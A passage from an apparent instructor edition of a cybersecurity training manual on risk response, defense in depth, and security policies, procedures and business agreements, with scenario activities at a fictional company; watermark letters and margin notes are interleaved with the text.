its privilege escalation variant CVE-2021-1675, were dubbed PrintNightmare.
lic
Note: Although the CVE is very useful for identifying weaknesses in your systems, in some
circumstances, you may be unable to replicate the vulnerability.
up
CWE and CAPEC

In addition to the CVE, the MITRE Corporation also maintains the Common Weakness
D
Enumeration (CWE™) and Common Attack Pattern Enumeration and Classification

(CAPEC™) databases. The CWE focuses on enumerating software vulnerabilities, while CAPEC
classifies specific attack patterns. These databases also tag each entry with a specific ID for easy
ot
reference.
• CVE site: https://cve.mitre.org/
N
• CWE site: https://cwe.mitre.org/

• CAPEC site: https://capec.mitre.org/
o
National Vulnerability Database (NVD)

D
The National Vulnerability Database (NVD) is a more robust superset of the CVE maintained
by NIST. The NVD uses the CVSS to assess vulnerabilities. It is available at: https://
nvd.nist.gov/.

Risk Response Techniques

Risk Response How an organization reduces or removes risk is based on the thresholds established for different
Techniques risks, and it is entirely dependent on the risk appetite of the organization. The following table
Consider providing or describes the four possible approaches to risk response.
asking students for non-
IT-related examples. Risk Response Description
This may help some Technique
students better
understand each Avoid Risk avoidance means that risk has been completely eliminated (reduced
e
response technique. to zero). This is generally achieved by terminating the process, activity, or
ut
application that is causing the risk. For example, if you do not need a chat
program to facilitate collaboration among employees, you might simply
block access to it from within your systems, thus eliminating the risk it
ib
brings. Total risk avoidance is virtually impossible in any organization, as
it would necessitate that you remove many vital systems your business
requires to function.
tr
Transfer Risk transference moves the responsibility for managing risk to another
is
organization, such as an insurance company or an outsourcing provider.
This external organization takes over and maintains the risks associated
with data and other resources. Examples include purchasing natural
D
disaster insurance to cover servers and the data present on them, and
relying on cloud providers to store and secure data. You should choose
the transference approach if the risks become larger and more
Mitigate
operations. or
complicated than your organization can manage without impeding your
Risk mitigation is the process of implementing controls and

e
countermeasures to reduce the likelihood and impact of risk to an
organization. Organizations will mitigate risk so that the potential harmful
at
outcomes do not exceed the organization's risk appetite. For example, if

you have a high-traffic network, you may reduce the risk the traffic poses
lic
to the network by implementing an intrusion prevention system (IPS).

You might still have to deal with some residual risks after mitigation.
Accept Risk acceptance is a response in which an organization identifies and
up
analyzes a risk, and then determines that the risk is within the
organization's appetite and no additional action is needed. The risk
management plan that an organization develops and implements will
outline its risk appetite, so any risks that are accepted are within the
D
parameters of what the organization deems unworthy of further response.

As previously stated, not all risks can be avoided; likewise, not all risks
can be transferred or mitigated. In your organization, you must decide
ot
what level of risk is unlikely or does not have enough potential for harm
to warrant extra effort and cost.
N
Note: Ignoring risk is not the same as accepting it. When you accept a risk, you have evaluated it
and decided not to transfer, reduce, or avoid it. When you ignore risks, you do not take the time
o
to identify and evaluate them. Ignoring risks is a dangerous approach to take, and can lead to
unforeseen disasters.
D
Note: Some responses will incorporate more than one technique. For example, you can begin to
mitigate risk until it reaches an acceptable level, at which point you accept that risk.

Inherent Risk and Residual Risk

Inherent risk is the risk an event will pose if no controls are put in place to mitigate it. Identifying
the inherit risk of an asset or activity will aid you in assessing which controls to put in place to
mitigate the risk.
Residual risk is the risk that remains even after controls are put in place. Identifying the residual
risk of an asset or activity will aid you in assessing the effectiveness of the controls you put in place
to mitigate the risk.
e
Communicating Recommendations for Mitigating Risk
ut
Unless you're fully in charge of making risk management decisions, you'll likely need to get approval Communicating
before you (or anyone else on your team) starts responding to risk. Whether it's your immediate Recommendations for
Mitigating Risk
ib
manager or someone higher up, you need to communicate recommendations to an audience that
can sign off on them. Remember, it's important to put risk in the context that business leaders can
understand—i.e., how it affects business operations, revenue, productivity, etc. The same goes for
tr
mitigation tactics. How will the tactics you recommend save the organization time and money? How
will not implementing the mitigation tactic, or implementing some cheaper tactic, cause problems?
is
The decision makers need to be convinced of its cost effectiveness, not just its technical
effectiveness.
D
However, there are situations where going through the normal channels and/or process to obtain
approval is just not feasible. Consider that there's an imminent attack on your systems and network
and every second counts. You don't have time to wait for the top-level management to meet and
or
discuss the issue at hand. This is where incorporating levels of authority into a risk management plan
is crucial.
Levels of Authority
e
at
Levels of authority determine what responsibility someone has to act. One common hierarchy has Levels of Authority
four levels:
lic
1. Act from instruction. The individual acts only when instructed to by other decision makers.
2. Act after approval. The individual is able to evaluate the situation themselves, but must still wait
for approval before acting.
up
3. Decide, inform, and act. The individual is able to act without obtaining approval, but they
must still notify a decision maker promptly.
4. Decide and act. The individual has the power to act with complete independence.
As an individual's knowledge, skills, and experience grow, so too does their level of authority.
D
However, the needs of the organization in an emergency are also important factors that can
temporarily change one's level of authority. If a skilled incident responder detects a potentially
ot
devastating attack in progress, they may have the authority to "decide, inform, and act" as stipulated
in the existing incident response plan. In a normal scenario or in response to a minor incident, they
may only be allowed to "act after approval."
N
Continuous Monitoring and Improvement

o
Continuous monitoring and improvement is the process of detecting changes in an environment Continuous Monitoring
and then quickly and efficiently addressing them. Since risk is always changing within an and Improvement
D
organization, the organization must continually evaluate its networks to ensure that implemented
controls are operating as intended. A good example of this is the use of patch and vulnerability
management software. Since new vulnerabilities are found regularly, and new patches are released
for those vulnerabilities, organizations should expect to have a recurring process to update
equipment. However, it is very time consuming to quantify the recurring change in an organization
with a regular risk assessment approach.

When risk is mitigated under a program of continuous monitoring and improvement, the business
will be able to bolster its operational processes and cut down on costly risk assessments. There are
software tools that provide this functionality by alerting security staff of unanticipated resource
access, invalid or expired software licenses, and mobile devices that attach to the network from
anywhere and at any time.
Verification and Quality Control

Verification and Quality Verification and quality control are the processes by which an organization tests a product to
e
Control identify whether or not it complies with a set of requirements and expectations. These requirements
ut
and expectations can be driven by customers and other stakeholders, or they can be driven by
internal and external compliance factors, such as industry regulations and company-defined quality
standards. Ultimately, an organization may choose to put its products and services through the
ib
verification and quality control processes to help mitigate financial, brand-based, and other risks that
come with pushing a poor-quality, unverified product to market.
tr
The following table lists some of the common strategies for verification and quality control.
Verification/Quality Description
is
Control Strategy
D
Evaluation/assessment Evaluation and assessment strategies typically involve identifying the state
of an organization's products and services. This helps the evaluator spot
problem areas and suggest potential corrective actions.
Auditing
or
Auditing is similar to evaluation and assessment strategies, but it takes a
more rigid approach to reviewing the organization. The auditor has a
predefined baseline they compare the organization's current state to,
which helps the auditor identify any specific violations that require
e
remediation.
at
Maturity model Maturity models review an organization against expected goals and
implementation determine the level of risk the organization is exposed to based on the
lic
degree to which it is currently meeting those goals. This enables the

reviewer to gain a more accurate perspective of how an organization's
products or services may be putting the organization at risk, and guides
risk management strategies as a response.
up
Certification When a product or service is certified, it is considered to have met all of

the requirements it is subject to after extensive testing. A certification is
often conducted by a third party that specializes in verification and quality
D
control, which may be a requirement in certain industries. The purpose of

certification is to provide all relevant stakeholders with an assurance of a
product or service's quality, mitigating risk for the manufacturer, vendor,
ot
and end user.

N
Defense in Depth
Defense in Depth In a defense in depth strategy, the organization assumes that no amount of comprehensive security
o
controls will truly be achievable, and that risk cannot be totally avoided. Therefore, a defense in
depth approach positions the several layers of security as if they were roadblocks. Each layer is
D
intended to reduce risk rather than eliminate it outright. This way, the risk loses its impact, or the
risk itself becomes much more easy to manage and mitigate. Additionally, instead of just focusing on
the tools used to protect the network and its systems directly, defense in depth is used to plan
personnel training, policy adoption, physical protection, and other, broader security strategies.
The following table lists some of the high-level components that make up a defense in depth
strategy.

Component Description
Personnel Your personnel are simultaneously the most powerful force for security in
your organization and its biggest vulnerability. A defense in depth strategy
sees that personnel undergo security training that is relevant to them. In
addition, you need to enforce certain best practices, like cross-training
personnel for similar functions in case one team member can no longer
fulfill their duties; mandating that a certain process is under dual control
so no one person can make a snap decision; describing how personnel
e
can or cannot share information with third-party consultants;
implementing a succession plan for personnel that move to other roles or
ut
leave the company; and more.
Processes As you've seen, processes must undergo continual improvement to truly
ib
be effective. A defense in depth program will schedule routine tests and
reviews to see if these processes comply with verification standards.
Likewise, you'll need a plan for retiring processes that no longer meet
tr
standards and cannot be improved upon.
is
Technologies There's certainly no shortage of technological solutions that can fit into a
defense in depth program. Some of the most significant include security-
focused appliances like intrusion detection and event management
D
systems; security suites like penetration testing platforms; cryptographic
solutions that ensure the confidentiality of data both stored and
transmitted; and many more. Most effective solutions are capable of
or
automatic reporting so that security personnel are alerted to problems as
quickly as possible. In cases where acquiring and maintaining security
solutions are beyond the organization's capabilities, they can still
outsource this component of defense in depth to a cloud-based Security
e
as a Service (SECaaS) provider.
at
Architecture design The design of the organization's network architecture plays a vital role in
any defense in depth strategy. How a network is designed in terms of its
lic
topology, both physical and logical, can have a strong effect on risks that
face the organization. One major architectural design strategy involves
segmenting the network into multiple sub-networks so that a compromise
of one segment does not necessarily mean it will spread to the rest of the
up
network.
Note: Defense in depth comes from the military strategy of arranging defensive lines or
D
fortifications so they can defend each other, particularly if there is an enemy incursion through
one of the lines of defense.
ot
N
o
D

e
ut
ib
tr
is
D
Figure 1-7: An example of a defense in depth strategy.
Guidelines for Mitigating Risk or

e
Guidelines for Mitigating Follow these guidelines when planning how you will mitigate risk in the organization.
Risk
at
Mitigate Risk in the Organization

When mitigating risk:
lic
• Categorize information into classes like public, private, restricted, and confidential.
• Classify information in terms of how it will impact your organization's CIA.
• Incorporate stakeholder input for CIA-based decisions.
up
• Understand technical controls in terms of how they do or do not fulfill CIA.

• Avoid, transfer, mitigate, or accept risk based on factors like cost, viability, resources, and
necessity.
D
• Implement continuous monitoring to quickly detect changes to an environment.

• Communicate to relevant stakeholders regarding how you measure, respond to, and mitigate
risks.
ot
• Put products and services through verification and quality control processes.
• Adopt a defense in depth strategy for layered risk mitigation.
N
o
D

ACTIVITY 1-3
Mitigating Risk
Scenario
e
Your team at Develetech has been busy assessing the various risks that could affect the company.
Now it's time for you to analyze these results and respond appropriately. Choosing the right risk
ut
mitigation strategies is essential in meeting stakeholder expectations and keeping your systems
secure at the same time.
ib
Activity: Mitigating Risk
1. Develetech is interested in implementing routine backups of all customer
tr
databases. This will help uphold availability because you will be able to
quickly and easily restore the backed up copy, and it will also help uphold
is
integrity in case someone tampers with the database.
D
What controls can you implement to round out your risk mitigation strategy
and uphold the components of the CIA triad?
or
A: Answers will vary, but a strong way to secure confidentiality is through encryption. Encrypting the
database will deter unauthorized users from making sense of the stored data. You could also
implement access control to prevent an intrusion before it even begins. This will keep your
databases out of the hands of an attacker. In addition, you can implement physical security
e
measures in case an attacker has in-person access to these databases.
at
2. During their risk assessment, your team has identified a security flaw in an
application your organization developed.
lic
To conduct a proper analysis of how this could bring risk to your organization,
what are some of the questions you need to ask?
up
A: Answers will vary, but you should ask how easily exploitable the flaw is, and what the scope of an
exploit could be. Can an exploit expose confidential information? Can it crash the app or otherwise
render other systems unavailable? What attack vectors exist that could allow an attacker to carry
out this exploit? What mitigation plans, if any, are in place to address this flaw? How easily and
D
quickly can you patch the flaw, and how will you deploy it so that all of the app's users are
covered?
ot
N
o
D

3. You've analyzed the application flaw and discovered that it could allow an
unauthorized user to access the customer database that the app integrates
with, if the app uses poor input validation. The attacker could glean
confidential customer information, which would have a high impact on your
business. However, you determine that your app's current input validation
techniques account for all known exploits of this kind.
How will you respond to this risk?
e
A: The answer is debatable and may require more careful analysis. However, some may argue that
the strong input validation controls already in place imply that you should just accept the risk and
ut
save yourself the time, effort, and cost of an active response. Others will say that this is
inadequate because it only accounts for known values, and that an attacker could find a way
around the validation. This would necessitate a response like mitigation, in which more application
ib
security controls are implemented to harden the app against attack. Some might suggest
transferring the risk to another organization that can provide more reliable security. Some might
even argue that the risk to your customers' confidentiality is too great, and that you should avoid
tr
the risk entirely by dropping the internally developed app and using a different solution.
is
D
or
e
at
lic
up
D
ot
N
o
D

TOPIC D
Integrate Documentation into Risk Management
A less direct, but still important, part of risk management is developing documentation for future
reference. Writing a policy and recording risk-related activity will move your risk management
strategy from the conceptual to the concrete. This will provide the foundation on which to support
e
your assessment and mitigation practices.
ut
From Policies to Procedures
ib
A policy identifies the organization's intentions. Policies are interpreted and made operational From Policies to
through standards, guidelines, and procedures. In regard to cybersecurity and compliance, these Procedures
terms are used as follows:
tr
Consider generating
discussion about
• Policies are high-level statements that identify the organization's intentions.
students' experiences
is
• Standards consist of specific low-level mandatory controls that help enforce and support with each type of
policies. document. You may also
• Guidelines are recommended, non-mandatory controls that support standards or that provide a want to discuss how
D
reference for decision making when no applicable standard exists. some organizations
consolidate these
• Procedures are step-by-step instructions on tasks required to implement various policies,
different types of
standards, and guidelines.
or documents into a single
document.
e
at
lic
up
D
ot
N
Figure 1-8: Policies are the foundation upon which standards, guidelines, and procedures are
o
built.
D
Processes
Processes are also components of documentation. They describe at a high level how actions can
achieve desired goals. This makes them distinct from procedures as they are not focused on specific
steps or instructions to be carried out, but rather an overall chain of activities. They do not fit within
any specific spot of the hierarchy as shown in the figure, as they can be included at any point. In
other words, policies can include language that defines processes. Standards, guidelines, and
Lesson 1: Assessing Cybersecurity Risk | Topic D

procedures can all reference processes in different ways. Cybersecurity, like most technical business
functions, involves many processes.
The Policy Lifecycle

The Policy Lifecycle The policy lifecycle starts once an organization determines it needs a formal information security
policy. The driver for an information security policy varies by organization; it could be for
compliance reasons, the increasing size of the organization necessitating a written security policy to
replace informal guidelines, to meet contractual obligations, or in response to a breach. Regardless
e
of the reasons for its development, ultimately, the policy must be approved by executive
ut
management, and in some cases the board of directors, should the organization be large enough.
Once the organization has identified a need, there are several ways to begin crafting a policy. One of
the easiest methods is to download a free policy template available from various security
ib
organizations, and then customize the policy to fit your organization. It is also common for
organizations to bring in a security consulting company to aid them in policy development.
tr
Regardless of how you approach your company's policy, it is important to also compare and contrast
the company's policy with those of other organizations. There may be topics or risks you did not
previously consider that affect the elements of the policy.
is
Not all policies are created equal. It is best to use clear and concise language within the policy that is
easy to understand. In other words, attempt to limit the legalese that pervades many policies. At the
D
same time, it is important to understand the organization's information security policy is a legal
document, which you may provide to employees, customers, and in some cases, a court of law.
or
In conjunction with any laws or regulatory requirements the organization may be under, you must
include business leaders in the development of the policy. If a policy is too strict, it may impair
workers' ability to conduct business, which in turn impairs the organization. A well-developed policy
should address all the risks the business may face. It is a living document that should be updated
e
regularly as the business, technology, environments, and risks in an organization change. When
emerging risks are identified, your policies should clearly state when to report an incident and whom
at
to report the incident to. Not all incidents require legal action, so it's necessary for the policy to
cover when to report to law enforcement versus when to report to internal staff only.
lic
up
D
ot
N
o
D

e
ut
ib
tr
is
D
Figure 1-9: An example security policy.
The Procedure Lifecycle

or
e
To support the policies your organization has developed, it's important to create procedure
at
The Procedure Lifecycle

documents that very clearly explain how the organization implements different security functions.
These are the "how-to" documents used by systems administrators and company employees that
lic
include the steps to implement and enforce the policies. They must be specific enough so that any
user who is expected to follow them can, regardless of their technical knowledge. If a predetermined
level of technical prowess is required, then that should be explicitly stated. For example, a data
up
handling procedure designed to be used by system administrators may make the assumption that the
administrators are familiar with the platform they are supporting; however, a similar procedure
designed for marketing and sales employees who have less technical familiarity may need more in-
depth and explicit steps.
D
The style and contents of these documents will also vary considerably between commercial
organizations and government bodies. It is common for documents relevant to military or similar
agencies, such as emergency services, to be more prescriptive than those for standard businesses. In
ot
other words, you must understand your target audience and tailor the procedures appropriately.
Procedure development is done in much the same way as policy development. Many standards
N
organizations such as NIST or CIS have predefined procedures or standards documents that you
can use as a starting point, and then you can tailor them to fit your organization. Certain
organizations will have specific types of standards they need to write to. Alternatively, you can bring
o
in consultants to help define procedures to make them compliant with particular policies. Regardless
of the approach, it is always a good idea to compare and contrast policies with other organizations
D
to see how they are implementing the "how-to" of information security. Many organizations, both
commercial and governmental, publish their key policies online to enable potential users of their
services to understand and gain confidence in how the organization manages information.
Just like the policies on which they are based, procedures are living documents. If a policy changes
in light of new business, technological, or environmental changes, then so too should procedures. A
policy that updates the organization's security posture in the face of new threats and risks is useless
unless it is translated into practice through procedural documentation.

e
ut
ib
tr
is
D
or
Figure 1-10: An example of a procedure document.
e
Topics to Include in Security Policies and Procedures
at
Topics to Include in All information security policies and procedures contain topics specific to an organization and its
Security Policies and requirements; however, there is a recommended list of topics that your security policies and
lic
Procedures procedures documentation should include. As you draft the documentation, be sure to obtain the
approval and buy-in from top management for the following:
up
• The scope of what the policy covers.

• How information is classified.
• Goals for secure handling of information.
• How other management policies relate to the security policy.
D
• References to supporting documents.

• Specific instructions for handling security issues.
ot
• The person or group who has specific designated responsibilities.

• Known consequences for security policy non-compliance.
N
Best Practices to
Incorporate in Security Best Practices to Incorporate in Security Policies and
Policies and Procedures
Procedures
o
Consider discussing with

students the potential
Security documents that incorporate the previous topics will help to reduce your overall risk.
D
ramifications of
incorporating these best Additionally, you should support the development of policies and procedures that contain the best
practices in security practices listed in the following table. Note that the organization will not necessarily be able to, or
policies and procedures, should not, incorporate all of these practices in the risk management process.
such as a loss of
productivity due to
practices like mandatory
vacation and job
rotation.

Best Practice Description
Separation of duties States that no one person should have too much power or responsibility.
Duties and responsibilities should be divided among individuals to
prevent ethical conflicts or abuses of power. Duties such as authorization
and approval, and design and development, should not be held by the
same individual because it would be far too easy for that individual to
defraud or otherwise harm an organization. For example, it would be
easier for an employee to make sure the organization only uses specific
e
software that contains vulnerabilities if they are the only one with that
responsibility.
ut
In many typical IT departments, roles like backup operator, restore
operator, and auditor are assigned to different people.
ib
Job rotation States that no one person stays in a vital job role for too long. Rotating
individuals into and out of roles, such as the firewall administrator or
tr
access control specialist, helps an organization ensure it is not tied too
firmly to any one individual because vital institutional knowledge is
is
spread among trusted employees.
Job rotation also helps reduce the risk of individuals abusing their power
D
and privileges, as well as preventing collusion between employees.
Mandatory vacation A method of preventing fraud that provides you with an opportunity to
review employees' activities. The typical mandatory vacation policy
or
requires that employees take at least one vacation a year in a full-week
increment so that they are away from work for at least five days in a row.
During that time, your corporate audit and security teams have time to
e
investigate and discover any discrepancies in employee activity.
When employees understand the security focus of the mandatory vacation
at
policy, the risk of fraudulent activities decreases.

Least privilege Dictates that users or systems should only have the minimal level of
lic
access necessary for them to perform the duties required. This level of
minimal access includes facilities, computing hardware, software, and
information. When a user or system is given access, that access should
up
still be only at the level required to perform the necessary tasks. If you
give a user or system access that exceeds what they require, then that is
one more vector that can be used to compromise your organization.
D
Incident response Defines monitoring, response, and reporting requirements for incidents
that involve security breaches or suspected breaches. Generally, this set of
policies requires a response to all incidents and suspected incidents within
ot
a defined time period and according to a reporting hierarchy that might

depend on the severity of the incident.
N
Security awareness and training both play a role in incident response so

the personnel whose primary roles fall outside of information security
know who and where to call for various levels of incidents, with a service
o
desk or help desk being the first line in the reporting hierarchy. Without
timely reporting to the right people, it will be much more difficult to
D
mitigate the risk of a security breach causing harm to your organization.


Forensic tasks Investigate from where a breach emanated, how a breach might have
occurred, and who might be responsible for the breach. The forensics
policy should include who is to be notified when forensics are required,
under which conditions they are required, and how to contact individuals
responsible for those duties. It is important to include legal counsel when
formulating the forensics policy so that appropriate legal guidelines can
be included, as necessary.
e
Employment and Defines on-boarding and off-boarding procedures when employment
ut
termination procedures begins and concludes, respectively. Proper on-boarding involves
acclimating new employees to the security practices that you expect them
to follow. This ensures there will be an expectation of liability in the
ib
arrangement. Likewise, when the employee leaves the organization, you
should establish an off-boarding process. The terminated employee must
agree to relinquish any access to company systems, data, and physical
tr
equipment.
In some cases, terminating an employee may put your company secrets in
is
risk of being leaked; to prepare for this, your policy should specify when
you should enforce non-disclosure agreements (NDAs).
D
Continuous monitoring Outlines what mechanisms and tools are used to continuously monitor
systems for changes that could increase risk to the organization. This
or
practice also defines exactly what events and environments should be
monitored based on a prior risk analysis. Some policies will include
provisions for continuous improvement so that the organization can take
a proactive role in addressing detected risks.
e
Training and awareness Without comprehensive education, user-based attacks, such as social
at
for users engineering, will be a major source of risk for an organization. In addition
to teaching users about the inherent risks of using technology, it is
important to also educate them on the policies and procedures required
lic
for them to operate safely within the organization's systems. Training

should also take into account the types of access and roles that employees
have. For example, you wouldn't train a salesperson on the risks of SQL
up
injection attacks, but you would educate your website developers on this
topic.
Specific training mechanisms can range from subtle reminders through
D
on-screen messaging at login, through paper-based pamphlets on

employee desks or common areas, to training for specific elements of
business operations (devices, software, building security, etc.).
ot
Auditing requirements Defines the types of audits performed, who performs those audits, and
and frequency how frequently they are performed, and clearly delineates the authority
N
for remediating audit issues found in the process. Auditing policies

typically include provisions for event triggers that are based on
organizational risk assessments.
o
The audit policy should also define the auditing requirements for business
partners and subcontractors, which should be included in all contracts
D
with third parties who could have an impact on the overall security of the
organization.


Information Information should be classified according to its sensitivity and criticality
classification to business operations. This enables you to prioritize your data protection
methods and apply those protections with regard to the CIA of that data.
Industry-recognized categories like public, private, restricted, and
confidential will fulfill most organization's needs, but you may wish to
create your own categorization scheme if these are not adequate.
e
Types of Policies
ut
The following table includes examples of common security policies found in many organizations. Types of Policies
ib
Policy Description
Acceptable use policy Defines a set of rules and restrictions for how various internal and
tr
external stakeholders may behave with respect to the organization's
assets. These policies typically outline general or specific behaviors the
is
organization believes will either reduce, increase, or have no effect on
risk. In most cases, stakeholders are expected to comply with an
acceptable use policy, and if they violate any of its terms, may be subject
D
to punitive actions (e.g., employment termination).
Account Outlines the responsibilities administrators have in keeping various
management policy
or
identity data secure and supportive of business objectives. Such policies
define expected behavior in how an external or internal user's identity is
created, altered, and deleted with respect to organizational systems.
e
Password policy A subset of account management policies that defines rules for how users
generate and maintain account credentials. It typically sets restrictions
at
such as the minimum number of characters in a password, the required

level of password complexity, and how often passwords must be changed.
Password policies attempt to reduce the risk of password cracking
lic
attempts.
Data ownership Outlines how information in the organization is assigned to "owners"—
up
policy that is, personnel who are ultimately responsible for keeping that
information secure and accessible by authorized parties only. These types
of policies help an organization ensure that all data is accounted for and
that each owner understands what is expected of them.
D
Data classification Outlines how an organization chooses to categorize the different levels of
policy data sensitivity. The organization can triage its security efforts based on
ot
what data will bring the most risk if it were leaked or tampered with.
Data retention policy Stipulates how and when an organization should store data within its
systems, and how and when the organization should purge that data. This
N
is especially important if the organization handles PII or PHI, which are

often subject to regulatory and legal restrictions.
o
Communication Outlines how members of a team or an organization are to communicate

policy with each other or communicate with external parties. This helps set
D
parameters for what is and is not acceptable to discuss. It also helps make
communication easier by providing clear paths for escalation.
Types of Procedures
The following table includes examples of common security procedures found in many organizations. Types of Procedures

Procedure Description
Patching Security researchers, development teams, and attackers discover new

vulnerabilities in software all the time, even if that software has been
around for years. Patching is therefore a vital procedure that keeps these
vulnerabilities from being exploited by a malicious user.
In an organization, patching procedures are often not just a simple press
of an update button or even an automated process. Security and other IT
personnel may need to thoroughly test patches before they push them out
e
to production systems, ensuring that the changes in software do not
ut
impact operations in a negative way.
Compensating A compensating control is a security measure put into place to mitigate
control development
ib
a risk when a primary security control fails or cannot completely meet
expectations. For example, a primary control may be that a host generates
an alert to an administrator when it detects suspicious behavior, like
tr
repeated failed login attempts. However, there is the possibility that the
alert won't reach the administrator for whatever reason or that the host
is
won't alert on the action at all. Manually reviewing logs like syslogs/event
logs, authentication logs, and firewall logs is therefore a compensating
control because a human being may be able to spot suspicious behavior
D
that the automated system failed to see.
You can also develop compensating controls to support primary controls,
or
not just to replace them when necessary. For example, engaging in data
analytics can help strengthen an existing tool or system. Security
personnel can perform trend analysis and historical analysis to predict
future behaviors that a static tool might not be able to, and personnel can
e
also aggregate and correlate data to supply that tool with a more complete
perspective of events.
at
Control testing Just like testing patches, organizations may need to outline procedures for
procedures testing planned or existing security controls. These procedures must test
lic
the control's efficacy at reducing risk, and weigh that against its cost.
Control testing procedures are best performed not just once, but
continuously, so that you can identify when the control is lagging behind
up
the changing technological landscape or when it is no longer meeting

changing business needs.
Remediation When a security assessment or other review identifies problem areas in
D
planning the organization, there should be a plan in place to remediate these issues.
Remediation plans typically include steps to remove or suspend a system
from production while the error is corrected; this must be done in a way
ot
that avoids disruption as much as possible. Remediation plans may also

include common steps to implement the correction itself, assuming it is a
known solution. Otherwise, the plan may need to provide more
N
generalized steps for a new and untested solution.

o
D

Procedure Description
Exception In this context, an exception is any circumstance that makes it difficult
management for an organization to carry out standard remediation procedures. As an
example, an organization may have legacy software that is integral to
business operations. A security assessment identifies several
vulnerabilities in the application programming interfaces (APIs) and
libraries it uses. Normally, the corrective action would just be to update
these APIs and libraries, but this will essentially break the legacy
e
application. Rewriting code in the legacy application to make it work with
these updates isn't entirely feasible, either. This is an exception to the
ut
remediation process.
Strong exception management procedures will anticipate issues like this,
ib
and will instruct personnel as to the best course of action. In the
aforementioned example, security personnel will need a plan in place to
inform higher-level decision makers as to their choices: either accept the
tr
risk or scrap the legacy application and look for a new solution. The
exception management plan may also provide security personnel with
is
compensating controls that don't quite mitigate the risk, but at least
reduce it somewhat or transfer it elsewhere.
D
Evidence production To support the forensic investigation process when it is needed after a
security incident, the organization should develop procedures for
collecting and producing evidence. Depending on the circumstances of
or
the incident, this evidence may be kept internal, but it also may need to be
presented to a third-party legal entity. Procedures should ensure the
evidence upholds integrity and is authenticated at every step of the
process, so that its relevance and accuracy cannot be called into question.
e
at
Business Documents That Support Security Initiatives

lic
There are several common types of business documents an information assurance professional Business Documents
should expect to encounter in their normal duties. Many of these focus on business partnerships, That Support Security
alliances, and vendor contracts. Since all organizations do business with other entities, there are Initiatives
up
many types of common agreements used to govern those relationships. Some of these agreements
specifically deal with security and risk management, whereas others may incorporate them
secondarily or not at all.
D
Document Description
Master service Lays the groundwork for any future business documents that two parties
ot
agreement (MSA) may agree to. The purpose of an MSA is to expedite the agreement
process as the relationship between each business partner grows.
Organizations may use an MSA to eliminate redundancies that arise when
N
the partner organizations form multiple agreements, like those listed in

the rest of the table.
Statement of Identifies the controls in place in an organization and explains their
o
applicability (SOA) purpose. As SOAs identify why a particular control is being used, they are
D
often directly influenced by the conclusions reached in a risk assessment.

The SOA should reference the policies and procedures that will take
advantage of the identified controls. It may be beneficial to not only
explain why a certain control was included, but to also explain why
certain controls were excluded.

Document Description
Business impact Identifies present organizational risks and determines the impact to
analysis (BIA) ongoing, business-critical operations and processes if such risks actually
occur. BIAs contain vulnerability assessments and evaluations to
determine risks and their impact. BIAs should include all phases of the
business to ensure a strong business continuation strategy.
Interoperability General term for any document that outlines a business partnership or
agreement (IA) collaboration in which all entities exchange some resources while working
e
together.
ut
Interconnection Geared toward the information systems of partnered entities to ensure
security agreement the use of inter-organizational technology meets a certain security
(ISA) standard for CIA. Because they focus heavily on security, ISAs are often
ib
written to be legally binding. ISAs can also support MOUs (see next
entry) to increase their security viability. NIST provides Special
tr
Publication 800-47 for developing an interconnection plan, titled Managing
the Security of Information Exchanges.
is
Memorandum of Usually not legally binding and typically does not involve the exchange of
understanding money. MOUs are less formal than traditional contracts, but still have a
D
(MOU) certain degree of significance to all parties involved. They are typically
enacted as a way to express a desire for all parties to achieve the same
goal in the agreed-upon manner. An MOU document might contain
or
background information on each organization; the history of the
relationship between the two organizations and circumstances that led to
the partnership; and a general or specific timeline for collaborative
business activities. Because they typically have no legal foundation,
e
MOUs are not the most secure agreement for a partnership.
at
Service-level Clearly defines what services are to be provided to the client, and what
agreement (SLA) support, if any, will be provided. Services may include everything from
hardware and software to human resources. A strong SLA will outline
lic
basic service expectations for liability purposes. The document may

include time frames within which failures will be repaired or serviced;
guarantees of uptime; or, in the case of a network provider, guarantees of
up
data upload and download rates.

Operating-level Identifies and defines the working relationships between groups or
agreement (OLA) divisions of an organization as they share responsibilities toward fulfilling
D
one or more SLAs with their internal or external customers.

Non-disclosure An agreement between entities stipulating they will not share confidential
agreement (NDA) information, knowledge, or materials with unauthorized third parties.
ot
NDAs also commonly state in which cases, if any, data may be used or
processed by the receiving entity. For data acquired through public
sources, an NDA is not enforceable.
N
Business partnership Defines how a partnership between business entities will be conducted,
agreement (BPA) and what exactly is expected of each entity in terms of services, finances,
o
and security. For security purposes, BPAs should describe exactly what
the partners are willing to share with each other, and how any inter-
D
organizational access will be handled.
Note: Certain documents, particularly those used in vendor agreements, may require the client
organization to fill out a questionnaire in order for the vendor to ascertain various information
about the client's current status and its needs.

Note: An example of an interconnection standard is the PSN Code of Interconnection (CoICo).

This UK government standard applies to connectivity services provided by commercial
suppliers. The standard can be found at https://www.gov.uk/government/publications/
psn-code-of-interconnection-coico.
Guidelines for Integrating Documentation into Risk

Management
e
Follow these guidelines to integrate documentation into your risk management strategies. Guidelines for
ut
Integrating
Integrate Documentation into Risk Management Documentation into Risk
Management
When integrating documentation into your risk management strategies:
ib
• Download free policy templates to make crafting a policy easier.
• Consider hiring a consultant if your organization can't support the internal development of
tr
policies.
• Use direct, concise language and dispense with legal jargon in policies.
is
• Include business leaders in policy development and make sure executive management approves
the policy before it is enforced.
D
• Support policies with clearly defined processes and procedures.
• Make processes and procedures easy to follow and tailor them toward your audience's technical
aptitude.
or
• Compare and contrast policies, processes, and procedures with those of other organizations.
• Consider policies, processes, and procedures to be living documents; that is, subject to change as
businesses and technology evolve.
e
• Incorporate best practices like job rotation, mandatory vacations, and user training into your
policies based on your specific organizational requirements.
at
• Involve HR, legal counsel, management, and other entities in the policy development process to
get unique perspectives.
lic
• Ensure that policies have provisions for legal and regulatory compliance.
• Identify any sensitive PII your organization handles.
• Be up front with your clients as to how their PII will be used and for what purpose it will be
up
used.
• Advise your clients on best practices to maintain privacy.
• Identify the various business documents and agreements applicable to your organization's needs.
• Use an agreement like an SLA in any partnership that requires strong security and legal and
D
financial liability.
ot
N
o
D

ACTIVITY 1-4
Integrating Documentation into Risk
Management
e
Data File
ut
C:\CNX0013Data\Assessing Cybersecurity Risk\dtech_aup_v1.docx
Activity: Integrating
ib
Documentation into Risk Before You Begin
Management
You have a Microsoft Windows® 10 computer to complete some of the activities in this course.
Make sure that you give
This client is a domain member in develetech.internal. You also have a Windows Server 2019
tr
students their assigned
numbers for the class.
computer running as a domain controller.
is
Steps in this activity will Note: Activities may vary slightly if the software vendor has issued digital updates. Your
vary if a word processing instructor will notify you of any changes.
program other than
D
LibreOffice Writer is
used. Scenario
This is one example of a
On more than one occasion, unknown and unauthorized users have tricked Develetech's help desk
security policy template.
